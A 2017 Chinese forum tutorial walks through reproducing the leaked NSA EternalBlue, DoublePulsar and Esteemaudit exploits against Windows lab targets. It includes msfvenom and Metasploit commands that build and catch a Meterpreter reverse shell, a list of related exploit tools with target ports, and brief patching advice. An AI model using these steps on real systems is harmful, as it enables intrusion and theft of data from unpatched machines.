设为首页 收藏本站
查看: 1444|回复: 0

[经验分享] 【渗透测试】NSA Windows 0day漏洞+修复方案

[复制链接]

尚未签到

发表于 2017-6-29 15:49:27 | 显示全部楼层 |阅读模式
  这个漏洞是前段时间爆出来的,几乎影响了全球70%的电脑,不少高校、政府和企业都还在用Windows服务器,这次时间的影响力堪称网络大地震。
  -----------------------------------------------------------------------------------------------------------------------
  一、实验环境
  本机IP:172.16.11.2  Windows 2003
  本机IP:172.16.12.2  Kali Linux
  靶机IP:172.16.12.3  WIN7 64
  靶机IP:172.16.12.4 WIindos 2003
  一、影响版本
  Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Sever 2012 SP0
  二、漏洞危害
  攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。一旦攻击成功,攻击者能直接控制目标主机,甚至直接下载数据库,盗取商业机密。
  三、复现过程
  Eternalblue 可以利用SMB漏洞获取系统权限
  Doublepulsar可以加载Metasploit生成恶意的DLL
  1、首先我们要在工具的根目录下创建一个listeningposts文件夹,否则运行程序时会报错
   DSC0000.png
  2、 运行 fb.py
  填入对应信息:
    靶机IP
    目标IP
    取消重定向
    指定日志文件目录
    创建新项目

    项目名称

    确认路径

   DSC0001.png
  3、这里我们已经配置完最基本的信息,需要使用插件



use Eternalblue    //使用Eternalblue
  4、接下来我们一路回车就OK了,只有几个需要特殊设置的。要注意选择的操作系统、系统位数、传输方式。我们测试环境是Win7 64 FB传输方式,在这里设置就可以,其他保持默认
DSC0002.png

  5、运行成功后会显示Eternalblue Successd
DSC0003.png

  ------------------------------------------------------------------------------------------------------------------------------------
  接下来我们测试另外一种插件
  1、用kali生成恶意DLL,我们 /home目录就会生成win.dll文件



msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll
DSC0004.png

  2、进入Metasploit,设置TCP监听端口,用于攻击成功后返回的Shell



msfconsole      
use exploit/multi/handler       //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp  //设置payload
show options          //查看配置信息
set LHOST 172.16.12.2        //设置本地IP
set LPORT 12399             //设置本地端口
run             //运行
DSC0005.png

  Metasploit已经成功运行,等待Shell的返回
  3、将dll文件放到C盘根目录,使用Doublepulsar来加载生成的dll文件。
  这里系统位数、后们操作、后们路径  --》 64、RunDLL、C:\win.dll,其他保持默认即可
  ----------------------------------------------------------------------------------------------------------------------------
  使用Esteemaudit插件 验证3389 RDP漏洞 本靶机地址:172.16.12.4
  1、和上述步骤一样,配置基本信息
  2、使用 Esteemaudit插件 这里讲CallbackPort设置为8877端口(其他端口也可以)
DSC0006.png

  3、手动加载 rudo_x86.dll、capa_x86.dll和lipa_x86.dll,因为插件默认选项都在D盘,它不能识别安装目录。
DSC0007.png

  4、其他保持默认设置即可
DSC0008.png

DSC0009.jpg




Explodingcan IIS漏洞利用工具,只对Windows 2003有影响
Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139和445
Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143
Englishmansdentist   通过SMTP漏洞攻击,默认端口25
Erraticgopher 通过RPC漏洞攻击,端口为445
Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88
Eclipsedwing   MS08-67漏洞利用工具
Educatedscholar   MS09-050漏洞利用工具
Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口
Zippybeer   SMTP漏洞利用工具,默认端口 445
Eternalsynergy   SMB漏洞利用工具,默认端口 445
Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389
  ---------------------------------------------------------------------------------------------------------------------
  四、漏洞修复方案
    使用防火墙过滤或者关闭137/139/445端口
    对于3389远程登录,至少要关闭智能卡登录选项
    升级补丁,更新系统

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-389365-1-1.html 上篇帖子: svn更新路径,解决办法详细步骤,eclipse里面的更新方法,svn废弃位置,Windows环境,svn服务器地址换了,如何更新本地工作目录 下篇帖子: zookeeper集群搭建(windows环境下)
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表